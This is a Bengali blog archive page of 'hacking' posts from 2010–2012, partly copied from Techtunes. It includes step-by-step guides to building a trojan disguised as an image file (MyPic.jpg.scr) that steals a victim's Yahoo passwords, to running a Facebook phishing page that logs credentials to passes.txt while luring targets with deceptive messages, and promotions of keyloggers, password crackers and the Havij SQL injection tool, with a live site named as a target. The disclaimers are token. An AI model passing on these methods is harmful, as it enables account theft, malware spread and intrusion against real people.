হ্যাকিং লেবেলটি সহ পোস্টগুলি দেখানো হচ্ছে৷ সকল পোস্ট দেখান
হ্যাকিং লেবেলটি সহ পোস্টগুলি দেখানো হচ্ছে৷ সকল পোস্ট দেখান

শনিবার, ২৫ আগস্ট, ২০১২

Windows 98, XP, Seven এর ইউজার পাসওয়ার্ড হ্যাক করুন




আমরা অনেক সময় Windows এ লগঅন বা ইউজার পাসওয়ার্ড দিই যাতে যে কেউ কম্পিউটারটি ব্যবহার করতে না পারে। তখন পাসওয়ার্ড না দিয়ে ঢুকার কোন সুযোগ নেই। যদি নিজের পাসওয়ার্ডটি নিজেই ভুলে যান তাহলে কি অবস্থা হবে? যদিও এক্সপিতে পাসওয়ার্ড ভাঙ্গতে তেমন একটা অসুবিধা হয় না। কিন্তু উইন্ডোজ সেভেন খুবই জটিল একটি অপারেটিং সিস্টেম যেখানে পাসওয়ার্ড ভাঙ্গার তেমন পরিচিত কোন সহজ পন্থা নেই। তবে আমার টিউটোরিয়ালটি অনুসরণ করে Windows XP, Windows Vista, Windows 7 [সম্ভবত Windows 8] এর পাসওয়ার্ড ভাঙ্গা কোন ব্যাপারই না। চলুন দেখি কি করতে হবে।  

বৃহস্পতিবার, ৩ মে, ২০১২

বিশ্বের সেরা ১৫টি পাসওয়ার্ড Hacking এবং Cracking সফটওয়্যার

আমি আপনাদের কিছু Hacking এবং Cracking সফটওয়্যার দিব। এসব সফটওয়্যার দিয়ে আপনি সইজেই কোন সফটওয়্যার Crack বা ব্যক্তিগত কারও প্রোফাইল Hack করতে পারবেন। এসব সফটওয়্যার দিয়ে আপনি একদিকে অন্যের উপকার অথবা আপকার করতে পারেন। সে চিন্তা আপনার বিবেকের কাছে রইলো। এই পৃথিবীর প্রতিটি বিষয়ের ভাল মন্দ দিক রয়েছে। একজন ডাক্তার চাকু দিয়ে যেমন রোগীকে সুস্থ করেন আবার অন্যদিকে একজন আপরাধী সেই চাকু দিয়ে অসৎ ভাবে মানুষের অপকার করে। এখানে কেবল মাত্র ব্যক্তির অবস্থান পরিবর্তন হয়েছে। তবে এ কথা সত্য যে অপরাধের বিচার একদিন হবেই, হোক সেটা ইহকালে বা পরকালে। আমার এই টিউটির উদ্দেশ্য আপনাদের উপকার করা, তবে কোন ভাবে যদি কেউ এর আপব্যবহার করে তবে ভবিষৎতে এর থেকে ১০০গুন উন্নত মানের হ্যাকিং টিউন আমি আর করবো না।

PDF Password Remover

@lmas 1

Windows XP Admin Password Remover

 বিশ্বের সেরা ১৫টি পাসওয়ার্ট Hacking এবং Cracking  সফটওয়্যার। ( মেগা টিউন ) | Techtunes

Zip File Password Cracker

@lmas 3

Microsoft Office Password Remover

 বিশ্বের সেরা ১৫টি পাসওয়ার্ট Hacking এবং Cracking  সফটওয়্যার। ( মেগা টিউন ) | Techtunes

Windows Vista Admin Password Recovery

@lmas 5

RAR File Password Cracker

@lmas 6

EXE File Password Recovery

@lmas 7

Windows 7 Password Cracker

@lmas 8

MSN Password Recovery

@lmas 9

Mozilla Firefox Password Cracker

@lmas 10
(সময় সল্পতার কারনে ১০টি সফটওয়্যারের নাম ও ছবি দিলাম।)
dyktqq বিশ্বের সেরা ১৫টি পাসওয়ার্ট Hacking এবং Cracking  সফটওয়্যার। ( মেগা টিউন ) | Techtunes

সোমবার, ১৯ মার্চ, ২০১২

আসুন হ্যাক করি ফেসবুক আ্যাকাউন্ট


 আসুন সহজ নিয়মে ফেইসবুক হ্যাক করি। নিচের নিচের নিয়মটি অনুসরণ করুন :

১। প্রথমে http://www.facebook.com এ যান।

সোমবার, ১২ মার্চ, ২০১২

রাউটার পাসওয়ার্ড হ্যাক



কোন কারনে আপনি ভুলে গেছেন, অথবা হারিয়ে গেছে আপনার অফিসের স্মল নেটওয়ার্ক ম্যানটেইন করা ব্রাডবেন্ড বা ২.৪GHz তরংগের ওয়ারলেস রাউটারের পাসওয়ার্ডটি। ছোট রাউটারগুলোতে পাসওয়ার্ড রিকোভারি করতে হয় Factory Default করে । রাউটারের পিছনে বা সামনে একটি ছোট ডিপ সুইচ থাকে, সেটা চেপে রাউটারকে Default settings এ নিয়ে যেতে হয়। বড় রাউটারগুলোর (The Network King Cisco Or Juniper) কথা আলাদা .

বুধবার, ১৫ ফেব্রুয়ারী, ২০১২

NetTools 5.0.7 ... একের ভেতরে সব কিছু!

 http://i.d.com.com/i/dl/media/dlimage/14/37/65/143765_large.jpeg

কয়েক বছর আগে হ্যাকিং নিয়ে একটি সিরিজ শুরু করেছিলাম। সেখানে একটি আইপি স্ক্যানার টুল দিয়েছিলাম যা অনেকেই পছন্দ করেছিলেন। আপনার নেটওয়ার্ক পরিবেশে কাজ করার জন্য অনেক ধরনেরই টুল রয়েছে যা দিয়ে আপনি অনেক ধরনের কাজ করতে পারবেন। সমস্যা হচ্ছে এই টুলগুলোর বেশীর ভাগই হ্যাকারদের দ্বারা তৈরি.. ফলে ব্যবহার করা কিছুটা বিপদজনক। আরেকটি সমস্যা হলো এতগুলো টুল সেটাপ করলে আপনার স্টার্ট মেনুর প্রোগ্রামস ফাইলের আকার কিম্ভুতকিমাকার ধারন করতে পারে। কিন্তু কেমন হয় যদি একটি টুল সেটাপ করলেই কাংখিত সবগুলো সুবিধা পাওয়া যায়? তেমনি একটি টুল হচ্ছে NetTools। বর্তমানে এর ভার্সন 5.0.7 পাওয়া যাচ্ছে। এটি আপনি নিশ্চিন্তে ব্যবহার করতে পারেন কারণ এতে কোন রকম স্প‌্যাইওয়্যার / ট্রোজান / ওয়ার্ম কিছু নেই। আরো সুখের খবর হচ্ছে এটি সম্পুর্ন বিনামূল্যে ওয়েবে পাওয়া যায়।

LANguard Network Scanner, অসাধারণ IP Scanner





আগের পোস্টে ১৭৬ টি নেটওয়ার্ক টুলের এক বিশাল ভান্ডার পেয়েও টুলগুলোর ব্যবহার না জানায় অনেকেই পুরোপুরি খুশি হতে পারেননি। তাদের জন্য এই পর্ব। এখানে একটি ল্যান স্ক্যানার ও এটি দিয়ে কি কি ধরনের মজা(নবীসদের জন্য মজারই বটে) করা যেতে পারে তা নিয়ে আলোচনা করা হচ্ছে...

টুলটির নাম LANguard Network Scanner. এটি দিয়ে আপনার নেটওয়ার্কে স্ক্যান দিয়ে অন্য ব্যবহাকারীদের কম্পিউটারের আইপি বের করে ফেলতে পারবেন। কিন্তু কথা হচ্ছে আইপি জেনে কি হবে? অনেক কিছুই হতে পারে। বিষয়টা কম্পিউটার নিয়ে আপনি কিধরনের কাজ করেন তার উপর নির্ভর করে। আমি এখানে সাধারন ব্যবহারকারীদের জন্য কিছু আলোচনা করছি-

শনিবার, ১৪ জানুয়ারী, ২০১২

আপনার ই-মেইল অ্যাকাউন্টটি হ্যাক হয়ে গেলে কি করবেন ??

আপনার ই-মেইল অ্যাকাউন্টটি হ্যাক হয়ে গেলে সেটি কিভাবে আনবেন তা নিয়ে এখন আলোচনা করব ।
ছবি
Gmail এর ক্ষেত্রে :
পদ্ধতি-১ : প্রথমে চেষ্টা করব কিভাবে আগের পাসওর্য়াড সহজ ভাবে ফিরিয়ে আনা যায় । এই পদ্ধতি তা খুবই সহজ । পদ্ধতি তা হল গুগুল আপনাকে আপনার গোপনীয় প্রশ্নটা জিজ্ঞেস করবে যদি আপনার প্রশ্নের উত্তর সঠিক হয়ে থাকে তাহলে password রিসেট করার details আপনার সেকেন্ডারী ই-মেইল অ্যাডসে চলে আসবে । তারপর আপনি তাদের প্রদত্ত লিংক থেকে পাসওর্য়াড রিসেট করতে পারবেন । এই পদ্ধতি অবলম্বন করতে নিচের লিংক এ যান ।

শনিবার, ৭ জানুয়ারী, ২০১২

ওয়েব সাইট হ্যাকিং এর সফটওয়্যার havij 1.14 pro ফুল ভার্সন

 https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDWdRqZQCotZedfYLen9WfSx2sd6zQq0ej1M4cANRUQH5jMpIsyGinBwJcWc6RvzS2tFgpdfccVCVn6wWZZrCDI8ogGgOSg7Vg1A9FR_-DXujyjHdrIY-kWxk5ruOyHpxw9Rf9I92_w3M/s1600/website+hack-wildhacker.com.jpg


হ্যাকিং এর জগতের এক অসাধারণ সফটওয়্যার এর নাম হাভিজ। আমি এটার প্রো ফুল ভার্সন শেয়ার করলাম। এস কিউ এল ইঞ্জেকশনের জন্য অনেকেই havij pro 1.14 ব্যাবহার করে থাকেন। যারা হ্যাকিং এর উপরে হাতে ঘড়ি নিতে চান তারা অবশ্যই এটি ব্যাবহার করে দেখবেন। সাধারণত এটির মুল কাজ যে কনো ওয়েব সাইটের ভুলনেরবল খুঁজে পাবার পরে সেই ওয়েব সাইটের ডাটা ব্যাস খুঁজে বের করে ডাটাবেস থেকে সেই সাইটের টেবিল খুঁজে বের করে টেবিল থেকে এডমিন এর ইউসার নেম ও পাস ওয়ার্ড এর হ্যাস খুঁজে বের করা। যাদের হ্যাকিং এর মটামটি ধারনা আছে তারা সবাই অবশ্যই হাভিজ কে চিনেন।


লাইভ ওয়েবসাইট হ্যাকিং (ফুল টিঊটরিয়াল নিন)

এই মাত্র একটা সাইট এর অ্যাডমিন একাউন্টে ঢুকে বসে আছি। আপনাদেরকে সম্পূর্ণ ভাবে দেখাব, কিভাবে আপনি হ্যাক করতে পারবেন। আমি একটি করে দেখাবো এবং আপনাদের জন্য আরো কয়েকটা দিয়ে দিবো, যদি চান যেগুলো সাথে সাথে হ্যাক হবে। আমি প্রমিস করতেছি আজকে সবাইকে আর নিরাশ করব না, খুব খুব খুব জলদি হ্যাকিং ক্লাশ শুরু হবে টিউনারপেজে। তাই আজকের টিউটোরিয়ালে বিশাদ কিছু না দেখিয়ে সরাসরি হ্যাকিং এ চলে গেলাম। আগে দেখে নিন আজকে আমরা লাইভ হ্যাক করব। এই সাইট টি ছবিতে দেখুন। http://name-shame.co.uk/


হ্যাকিং ই-বুক

এখানে কিছু হ্যাকিং বিষয়ক ই-বুক শেয়ার করলাম। প্রত্যেকটি বইয়ের ডাউনলোড লিংক আলাদাভাবে দেয়া আছে। আপনার যে বইটা দরকার সেটা আলাদাভাবে ডাউনলোড করে নিতে পারবেন। ধন্যবাদ...

 

Windows 7 Tweaks

undefined

সোমবার, ২৬ ডিসেম্বর, ২০১১

জিমেইল হ্যাকিং


gmail hack Gmail Hacking !!! (এই টিউনটি দ্বারা কেউ সামান্য ক্ষতিগ্রস্থ হলে টেকটিউনস নিঃদিধায় ডিলিট বা পাসওয়ার্ড প্রোটেক অথবা ডাউনলোড লিঙ্কটি বন্ধ করতে পারবেন।) | Techtunes 

জিমেইল আই.ডি হ্যাক করা সবচেয়ে কঠিন কারন এর নিরাপত্তা সবচেয়ে জোরদার তাই এই পদ্ধত্তি ছাড়া অন্য কেন পদ্ধত্তি নেই।( কীলগার ব্যাতীত)
সবাইকে স্বাগতম আমার আজকের টিউনিং পেজে। আশা করি আপনারা সবাই ভাল আছেন। আজ আমি আপনাদের জিমেইল হ্যাকিং সম্পর্কে ট্রিকস্ দিব। আমরা সকলেই জানি জিমেইল হ্যাক করা সোজা ব্যাপার নয়। কেবল মাত্র অতি দক্ষ্য হ্যাকার ছাড়া এটি সম্ভব নয়। তাই বর্তমান যে সকল জিমেইল আই.ডি হ্যাক হচ্ছে তা সবই কীলগার সফটওয়্যারের মাধ্যমে। তবে এই ট্রিকসটির মাধ্যমে কীলগার ছাড়াও কারও জিমেইল আই.ডি হ্যাক করা সম্ভব। এসব ট্রিকসটি দিয়ে আপনি একদিকে অন্যের উপকার অথবা আপকার করতে পারেন। সে চিন্তা আপনার বিবেকের কাছে রইলো। এই পৃথিবীর প্রতিটি বিষয়ের ভাল মন্দ দিক রয়েছে। একজন ডাক্তার চাকু দিয়ে যেমন রোগীকে সুস্থ করেন আবার অন্যদিকে একজন আপরাধী সেই চাকু দিয়ে অসৎ ভাবে মানুষের অপকার করে। এখানে কেবল মাত্র ব্যক্তির অবস্থান পরিবর্তন হয়েছে। তবে এ কথা সত্য যে অপরাধের বিচার একদিন হবেই, হোক সেটা ইহকালে বা পরকালে। আমার এই টিউটির উদ্দেশ্য আপনাদের উপকার করা, তবে কোন ভাবে যদি কেউ এর আপব্যবহার করে তবে ভবিষৎতে এর থেকে ১০০গুন উন্নত মানের হ্যাকিং টিউন আমি আর করবো না। যাক অনেক কথাই বলে ফেললাম এখন কাজের কথায় আসি…

বৃহস্পতিবার, ২২ ডিসেম্বর, ২০১১

রেপিড শেয়ার থেকে যে কনো ফাইল ফ্রী ডাউনলোড করুন প্রিমিয়াম একাউন্টের মত



রেপিড শেয়ার থেকে প্রিমিয়াম স্পিড এ ডাউনলোড করার জন্য এগুলো ইউস করতে পারেন, এখানে ১৪টি সোফট দিলাম। এগুলো ইউস করলে প্রিমিয়াম একাউন্ট না থাকলেও সেভাবে ডাউনলোড করতে পারেন একদম ফ্রী ফ্রী। আসা করি সবার ভালো লাগবে। সাইজ ও ছোট আছে তাই প্রবলেম হবে না। মত্র ৩৪ মেগা সব গুলো এক বারে ডাউনলোড করতে মাত্র ১টি ক্লিক ই ইনাফ।
AIO Contains:
01. RapidShare Leecher 2007 2.0
02. Rapidshare Auto Downloader 3.7.1
03. Rapidshare Queuer 2.2
04. Rapidshare Search Tool 2.3
05. RapidShare Downloader 1.4
06. Rapidshare Mass Downloader 1.0
07. FreeRapid Downloader 0.83 Build 522
08. RapidBIT 1.2
09. RapidAssist 1.0.0
10. RapidWareX 1.2.1
11. RapidZuca 1.1
12. RSDownloader 2.3
13. Rapget.RS 1.0.4.1
14. Rapid Media Server 0.5.5.0
ডাউনলোড করুন

মূল লেখা এখানে

ইয়াহু পাসওয়ার্ড হ্যাক করুন ভিকটিম কে বোকা বানিয়ে

হয়ত অনেকেই এই মজার সফটওয়্যার টি সম্পর্কে জানেন । নিচের লিঙ্ক থেকে এর ফুল ভার্সন টি রাড় ফাইলে ডাউন লোড করে নিন ।ডাউন লোড করার আগে অবশ্যই আপনার আন্টিভাইরাস এবং ফায়ারওয়াল অফ করে নিন ।ভয় পাবেন না এটা আপনার পিসি এর কোন ক্ষতি করবে না ।১০০% নিশ্চিন্তে থাকুন । http://www.mediafire.com/?kqdbexpicpidswc ডাউন লোড করা হয়ে গেলে RAR ফাইলটি Extract করে ফোল্ডার ফাইল এ রুপান্তর করে নিন । তার পরে ফোল্ডার ফাইল টি ওপেন করুন । নিচের ছবিটি লক্ষ করুন -> উপরের ছবিটিতে যেখানে লাল মার্ক করা আছে সেখানে ডাবল ক্লিক করে অথবা মাউস এর ডান বাটন ক্লিক করে ওপেন করুন ।তার পর নিচের ছবিটির মতো একটি বক্স ওপেন হবে ।
এখন উপরের ছবিটি ভাল করে লক্ষ করুন এবং যেভাবে কমান্ড করা আছে সেভাবে উপরের ডান পাশের এবং বাম পাশের ৩ টি করে ৬ টি বক্সে টিক মার্ক বসিয়ে দিন ।তার পরে (Y! ID) লিখা বক্সে আপনার ইমেইল আইডি লিখুন , কিন্তু মনে রাখবেন yahoo.com টুকু লিখবেন না ।যেমন ধরুন আপনার আইডি( abcd_12@yahoo.com) এই ক্ষেত্রে লিখুন শুধু (abcd_12) ।এখানে বলে নেই আপনি আপনার যে আইডি টি এখানে ব্যাবহার করবেন সেই আইডি তে অফ লাইন মেসেজ হয়ে আসবে ভিক টিম এর পাসওয়ার্ড ।এখন আপনার মনে আপনার আইডি নিয়ে কোন সন্দেহ থাকলে একটি নতুন ইয়াহু আইডি বানিয়ে নিতে পারেন । তার পরে ( Binder) বক্সে একটি টিক চিহ্ন বসিয়ে দিন । উপরের ছবিটি লক্ষ করুন , বাম পাশের লাল মার্ক করা স্থানে ক্লিক করুন ।আপনার ভিক টিম এর নিকট পাঠানোর জন্য একটি ছবি সিলেক্ট করুন আপনার কম্পিউটার থেকে ।যেকোনো ছবি হলেই হবে ।মনে রাখবেন এই ছবিটি দিয়েই আপনি ভিক টিম কে বোকা বানাবেন ।এখন ছবিটি সিলেক্ট করে '' Open'' এ ক্লিক করে বাইন্ড করুন ।

উপরের ছবিটির যেখানে লাল মার্ক করা আছে সেখানে ক্লিক করে ( jpg 2 ) সিলেক্ট করুন ।
উপরের ছবিটি লক্ষ করুন লাল গোল মার্ক করা স্থানে ক্লিক করে ''MyPic.jpg.scr'' সিলেক্ট করে নিন । তার পরে একটু নিচে লাল মার্ক করা ''Create MPS'' এ ক্লিক করুন । ''Create MPS'' এ ক্লিক করার পরে উপরের ছবিটির মতো '' MPS Creator'' নামের একটি ছোট বক্স ওপেন হবে । সেই বক্স এ লাল মার্ক করা ''OK '' তে ক্লিক করুন । এখন আপনার এক্সজাস্ট করা ফাইল ফোল্ডারটি ওপেন করুন ।দেখুন উপরের ছবিতে একটি ছবির আইকন যুক্ত হয়েছে ''MyPic.jpg.scr '' নামে । আপনার কাজ শেষ । এখন আপনি এই ছবিটি আপনার কাঙ্ক্ষিত ভিক টিম এর কাছে যে ভাবেই হোক পাঠিয়ে দিন । যেমন ইয়াহু মেসেঞ্জার , ইমেইল , স্কাইপি , জিমেইল , নিম্বুজ এসবের মাধ্যমে । আপনি চাইলে কোন হস্টিং সাইটে আপলোড করে তাকে লিঙ্ক টি ও দিতে পারেন । তার পর অপেক্ষা করে যান ।ভিক টিম আপনার ছবিটি পাওয়ার পরে যদি ওপেন করে এবং ছবিটি ওপেন করার পরে সে তার ইয়াহু আইডি ওপেন করতে পাসওয়ার্ড লিখে তাহলে আপনি ১০০০% নিশ্চিন্ত থাকুন আপনার ইয়াহু মেসেঞ্জারে তার লিখা পাসওয়ার্ড টি অফলাইন মেসেজ হয়ে চলে আসবে । যে আইডি টি আপনি ছবিটি বানাতে ব্যাবহার করেছিলেন সে আইডি তে আসবে পাসওয়ার্ড । অনেক সময় ভিক টিম এর পাসওয়ার্ড '' Password'' এরুপ ভাবে চলে আসে । এমন আসলে মনে করবেন এটা সঠিক নয় । এমন আসার কারন হল অনেকে পাসওয়ার্ড সেভ করে রাখে তাই এমন আসে। মন খারাপ করার কোন কারন নেই । যত দিন না ভিক টিম তার উইন্ডোজ সেটাপ দিচ্ছে তত দিন এই টরেজন টি তার পিসি তে থেকে যাবে ।সুতরাং বুঝতেই পারছেন সে একদিন না একদিন পাসওয়ার্ড লিখবেই ।আর আপনি তা পেয়ে যাবেন তখন । মজার বেপার কি জানেন ? তার মেসেঞ্জার এ যত আইডি ওপেন করা হবে তার সব পাসওয়ার্ড আপনি পেয়ে যাবেন ।আরেকটা মজার কথা বলি যখন আপনি ভিক টিম এর ইয়াহু আইডি এর পাসওয়ার্ড পেয়ে যাবেন তখন তো তার ফেসবুক ও আপনার নিয়ন্ত্রণে নিয়ে নিতে পারবেন । এ ক্ষেত্রে আপনি তার ইয়াহু এর পাসওয়ার্ড টি বদলে ফেলুন এবং ইমেইল আইডি দিয়ে ফেসবুকে খুঁজুন তার আইডি , তার পরে ফেসবুকের পাসওয়ার্ড টি রেস্ট করে নিন । হা হা হা হা হা :D ভুলেই গিয়েছিলাম বলতে কাজ শেষে আপনার এন্টিভাইরাস এবং ফায়ার ওয়াল টি অন করে নিবেন । ভাইয়ারা সব কিছুতে যেমন আনন্দ থাকে তার সাথেও থাকে কিছুনা কিছু সমস্যা । এর মাঝেও আছে একটি সমস্যা আর তা হল এন্টিভাইরাস এটি ধরে ফেলতে পারে । তাই আমি দুঃখিত । তবে যারা এন্টিভাইরাস ব্যাবহার করেনা তাদের কে বোকা বানাতে কোন সমস্যা হবেনা ।

মূল লেখা এখানে

Google Books থেকে ইচ্ছে মত ইবুক ডাউনলোড করুন



যারা অনলাইনে ইবুক খোঁজাখুঁজি করেন তারা সবাই জানেন ইবুকের একটা বিশাল সম্রাজ্য হল Google Books। বিভিন্ন ক্যাটাগরীর প্রচুর ইবুক এখানে পাওয়া যায়। কিন্তু Google Books এর সীমাবদ্ধতা হল, আপনাকে অনলাইনেই পড়তে হবে। ডাউনলোডের কোন ব্যবস্থা এতে নেই। ফলে যারা ২৪ ঘন্টা ইন্টারনেটে কানেক্টেড তারা ছাড়া অন্যদের ক্ষেত্রে এটা তেমন কাজে আসে না। এই সমস্যা সমাধানের জন্য বানানো হয়েছে Google Book Downloader। এই ইউটিলিটি সফটওয়্যারটি ব্যবহার করে আপনি Google Books থেকে যে কোন ইবুককে pdf ফরম্যাটে আপনার পিসিতে ডাউনলোড করতে পারবেন। তবে এটা শুধুমাত্র শিক্ষামূলককাজে ব্যবহারের জন্য বানানো হয়েছে।
Google Book Downloader চালানোর জন্য আপনার পিসিতে Microsoft .net Framework 3.5 SP1 ইনস্টল করা থাকতে হবে। Microsoft .net Framework 3.5 SP1 ইনস্টল করার পর এই লিংক থেকে Google Book Downloader ডাউনলোড করে ইনস্টল করে নিন।
যেভাবে ইবুক ডাউনলোড করবেন:
১. Google Book Downloader চালু করুন।
২. Google Books এ গিয়ে আপনার প্রয়োজনীয় ইবুকটি খুঁজে বের করুন। ধরা যাক, আপনি Absolute beginner’s guide to Wi-Fi wireless networking ইবুকটি ডাউনলোড করবেন। এটার লিংক হবে
http://books.google.com/books?id=tQohcXSFBNkC&printsec=frontcover&dq=networking
বোল্ড করা নাম্বারটি হল এই বইয়ের কোড।
৩. Google Book Downloader এ কোডটি পেস্ট করুন। এবার Check বাটনে ক্লিক করুন। বইটির ডাউনলোড লিংক খুঁজে বের করবে।
৪. Download entire book বাটনে ক্লিক করুন। সম্পূর্ন ইবুকটি ডাউনলোড হবে।
৫. Save entire book as… বাটনে ক্লিক করে ইবুকটি আপনার পিসিতে সেভ করুন।

মূল লেখা এখানে

শনিবার, ৮ মে, ২০১০

বিশ্বের সেরা ফ্রী ৫টি কীলগার সফটওয়্যার

 http://i1-news.softpedia-static.com/images/news2/Anti-Keylogger-Plugin-KeyScrambler-1-1-Supports-IE-7-and-Firefox-2.png
আমরা কম বেশী সবাই জানি কীলগারের কাজ কি। কীলগার সাধারনত হার্ডওয়্যার এবং প্রোগ্রাম, এই দুই ভাবেই হয়ে থাকে। হার্ডওয়্যার কীলগার পিসির কী-বোর্ডের সাথে লাগানো হয়। একটি হার্ডওয়্যার কী-লগার দেখতে AA ব্যাটারির মতন। অন্য দিকে প্রোগ্রামিং কী-লগার ব্যবহারে কিছুটা সহজ এবং নিরাপদ। এসব কী-লগার সফটওয়্যার দিয়ে আপনি সইজেই কারও ব্যক্তিগত প্রোফাইল Hack করতে পারবেন। এসব সফটওয়্যার দিয়ে আপনি একদিকে অন্যের উপকার অথবা আপকার করতে পারেন। সে চিন্তা আপনার বিবেকের কাছে রইলো। এই পৃথিবীর প্রতিটি বিষয়ের ভাল মন্দ দিক রয়েছে। একজন ডাক্তার চাকু দিয়ে যেমন রোগীকে সুস্থ করেন আবার অন্যদিকে একজন আপরাধী সেই চাকু দিয়ে অসৎ ভাবে মানুষের অপকার করে। এখানে কেবল মাত্র ব্যক্তির অবস্থান পরিবর্তন হয়েছে। তবে এ কথা সত্য যে অপরাধের বিচার একদিন হবেই, হোক সেটা ইহকালে বা পরকালে। আমার এই টিউটির উদ্দেশ্য আপনাদের উপকার করা, তবে কোন ভাবে যদি কেউ এর আপব্যবহার করে তবে ভবিষৎতে এর থেকে ১০০গুন উন্নত মানের হ্যাকিং টিউন আমি আর করবো না।
টেকটিউনস এবং আপনাদের অনুমতি পেলে সামনে জিমেইল/Gmail হ্যাকিং টিউন করতে পারি। যদিও ১৭এপ্রিল আমার পরীক্ষার জন্য টিউন বৃহস্পতি ও শুক্রবার করি BUT আজ এক স্যারের প্রাইভেট বন্ধ থাকার কারনে খুব অল্প সময়ে টিউনটি করলাম।
_____________________________________________________________________________________
1. REFOG Free Keylogger:
Almas IV
@lmas1 বিশ্বের সেরা ফ্রী ৫টি কীলগার সফটওয়্যার। ( ১০০% ফ্রী মেগা টিউন ) | Techtunes
2. Revealer Keylogger Free Edition:
Almas V
@lmas1 বিশ্বের সেরা ফ্রী ৫টি কীলগার সফটওয়্যার। ( ১০০% ফ্রী মেগা টিউন ) | Techtunes
3. Quick FREE Keylogger:
Almnas III
@lmas1 বিশ্বের সেরা ফ্রী ৫টি কীলগার সফটওয়্যার। ( ১০০% ফ্রী মেগা টিউন ) | Techtunes
4. Actual Keylogger:
Almas I
@lmas1 বিশ্বের সেরা ফ্রী ৫টি কীলগার সফটওয়্যার। ( ১০০% ফ্রী মেগা টিউন ) | Techtunes
5. 007 Keylogger:
Almas II
@lmas1 বিশ্বের সেরা ফ্রী ৫টি কীলগার সফটওয়্যার। ( ১০০% ফ্রী মেগা টিউন ) | Techtunes

Source: http://techtunes.com.bd/hacking/tune-id/21868/

শুক্রবার, ৭ মে, ২০১০

ফেইসবুক হ্যাকিং

বর্তমানে ফেসবুক আই.ডি হ্যাক করা সবচেয়ে কঠিন কারন এর নিরাপত্তা সবচেয়ে জোরদার তাই এই পদ্ধত্তি ছাড়া অন্য কেন পদ্ধত্তি নেই( কীলগার ব্যাতীত)

 Facebook Hacking !!! হ্যাকিং পর্বঃ ২ | Techtunes

সবাইকে স্বাগতম আমার আজকের টিউনিং পেজে। আশা করি আপনারা সবাই ভাল আছেন। আজ আমি আপনাদের ফেসবুক হ্যাকিং সম্পর্কে ট্রিকস্ দিব। আমরা সকলেই জানি বর্তমানে ফেসবুক আই.ডি হ্যাক করা সোজা ব্যাপার নয়। কেবল মাত্র অতি দক্ষ্য হ্যাকার ছাড়া এটি সম্ভব নয়। তাই বর্তমান যে সকল ফেসবুক আই.ডি হ্যাক হচ্ছে তা সবই কীলগার সফটওয়্যারের মাধ্যমে। তবে এই ট্রিকসটির মাধ্যমে কীলগার ছাড়াও কারও ফেসবুক আই.ডি হ্যাক করা সম্ভব। এসব ট্রিকসটি দিয়ে আপনি একদিকে অন্যের উপকার অথবা আপকার করতে পারেন। সে চিন্তা আপনার বিবেকের কাছে রইলো। এই পৃথিবীর প্রতিটি বিষয়ের ভাল মন্দ দিক রয়েছে। একজন ডাক্তার চাকু দিয়ে যেমন রোগীকে সুস্থ করেন আবার অন্যদিকে একজন আপরাধী সেই চাকু দিয়ে অসৎ ভাবে মানুষের অপকার করে। এখানে কেবল মাত্র ব্যক্তির অবস্থান পরিবর্তন হয়েছে। তবে এ কথা সত্য যে অপরাধের বিচার একদিন হবেই, হোক সেটা ইহকালে বা পরকালে। আমার এই টিউটির উদ্দেশ্য আপনাদের উপকার করা, তবে কোন ভাবে যদি কেউ এর আপব্যবহার করে তবে ভবিষৎতে এর থেকে ১০০গুন উন্নত মানের হ্যাকিং টিউন আমি আর করবো না। যাক অনেক কথাই বলে ফেললাম এখন কাজের কথায় আসি…

______________________________________________

১। প্রথমে এখান থেকে “Facebook Hacking” টি ডাউনলোড করুন।

২।এর ভিতরে মোট দুইটি ফাইল পাবেন, যথাক্রমেঃ

  1. Index.html
  2. write.php

৩। এখন এই তিনটি ফাইলকে যেকোন webhost সাইটে আপলোড করেদিন। যেমনঃ

৪। এবার Index.html নামক ফাইলটির লিঙ্ক আপনার কাঙ্খিত ব্যক্তির নিকট পাঠিয়ে দিন এবং তাকে লগিং করতে বলুন। তাকে লগিং করতে বাধ্য করবার জন্য নানা রকমের চাটু মূলক কথা বা হতভম্ব হবার মতন অথবা উত্তেজনা মূলক কথা মেইলে লিখতে পারেন। এছাড়া ফেসবুকে মেসেজ আকারে লিঙ্কটি দিতে পারেন এতে সন্দেহের মাত্র কম হবে। তারপর কেবল আপেক্ষার পালা।

৫। যখন সে Index.html এ তার ফেসবুক আই ডি এবং পাসওয়ার্ড লিখতে তা সাথে সাথে “passes.txt” নামে আপনার webhost সাইটে সেভ হবে।

Facebookphishing Facebook Hacking !!! হ্যাকিং পর্বঃ ২ | Techtunes

৬। এখন “passes.txt” ফাইলটি ওপেন করে আপনার কাঙ্খিত ব্যক্তির ফেসবুক আই ডি এবং পাসওয়ার্ড দেখতে পাবরেন।

 Facebook Hacking !!! হ্যাকিং পর্বঃ ২ | Techtunes

আসা করি আমার এই টিউনটি আপনাদের কাজে লাগবে। আর ভাল লাগলে আমাকে অবশ্যই কমেন্ট করবেন। সবার প্রতি অনুরোধ রইলো এর অপব্যবহার না করবার


Source : http://techtunes.com.bd/hacking/tune-id/22272/

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Best Buy Coupons